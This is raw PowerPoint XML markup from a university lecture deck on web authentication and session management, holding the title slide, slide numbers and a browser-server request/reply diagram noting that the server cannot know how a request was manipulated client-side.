            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235246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9F8A5-8FD6-EA4C-8C10-4D7FB5642262}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3855927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309022B6-7DE4-F949-BE3B-5892F6D00B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12ED69A2-6898-5E45-993B-0D58C42EB4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Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70C96B8-56CA-B342-B63E-B7B39C7C5CE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8B5BBBD7-49AA-0C48-8AB0-A73FDD063E12}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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83753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70730098-79FF-3640-B0C4-7231C3284B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4BA6E080-5DCA-364D-B148-1F1E74512A21}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E28F369A-90F4-204E-98AF-0E4C52F12780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F530B50-F3F8-744E-B7E4-F89E8988B2C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="931863" y="4408488"/>
            <a:ext cx="51212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03499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B39A4640-D9B1-C149-9DC4-6576305FC0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7FC0C41A-33CE-4F41-93B8-447363EB275D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D04C957-1454-434F-8D55-AFCAFF23B987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67441887-231C-664F-BF27-9CE2AE9D8093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="931863" y="4408488"/>
            <a:ext cx="51212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7868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696913"/>
            <a:ext cx="6184900" cy="3479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E697A42-EC76-804F-9120-277495F1715F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3251052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9/22/21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8770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564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0609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264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9/22/21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56078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1838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9/22/21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16312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812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9696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9/22/21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957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9/22/21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301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9/22/21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3553542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l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="40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customXml" Target="../ink/ink9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.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1.emf"/><Relationship Id="rId7"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1.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xm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291.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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18.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId20"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customXml" Target="../ink/ink22.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink29.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink32.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.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customXml" Target="../ink/ink7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><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10.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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C8AC92D2-D6DE-4772-A874-5D65F883F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61" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2E3678-25D0-49F9-9BD6-8D4D60565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1C81EC1-E2C4-BE41-B86A-1C257788F68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136849" y="1838472"/>
            <a:ext cx="5716338" cy="3042706"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>Web AUTHENTICATION &amp; SESSION MANAGEMENT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Vitaly Shmatikov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Rectangle 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63A45CD5-61B0-48E1-8090-7584418C2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6D4C1FD-C274-4FA8-939A-09E6498EFC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13D4426-8AD5-43D7-8033-05DBB3BFE6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C8029B-C6E2-4459-859A-7539865E00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2BE8DAC-AFAE-F54B-82D7-32EC0C0650EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="19757" b="19757"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7081771" y="1617889"/>
            <a:ext cx="4312474" cy="3927021"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0FAB41-7AE9-D346-9647-AC5206D0C715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545608" y="4731345"/>
            <a:ext cx="5359159" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>most slides are from the Stanford Web security group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56008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8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555557" y="1994803"/>
            <a:ext cx="5407479" cy="377190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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD746C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2558403" y="2777441"/>
            <a:ext cx="1905000" cy="1103312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4463404" y="2956828"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 253"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>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91" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EABED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8765529" y="3214004"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8549629" y="2798079"/>
            <a:ext cx="1095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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4463403" y="3258454"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 287"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"/>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96" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A45613-34A7-6646-BAAE-9B343E16E6BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5098403" y="2701242"/>
            <a:ext cx="1022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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4ED96F-F240-B944-82EF-DBCBA7330881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5371794" y="3544203"/>
            <a:ext cx="735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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D281728A-C6D7-7246-88EE-C2118FCC53CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember: This is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597FB154-A82D-A940-A752-052C259508A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7372866" y="3874404"/>
            <a:ext cx="3881402" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Server does not know how the request may have been manipulated on the client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="Devil Icons Matt - Free vector graphic on Pixabay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7248634-CC74-9048-B75C-D7801E747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233" y="3552918"/>
            <a:ext cx="990886" cy="77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98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9EBE4D1-0903-124D-8994-F0C2CF5E9D8A}"/>
              </a:ext>
            </a:extLst>
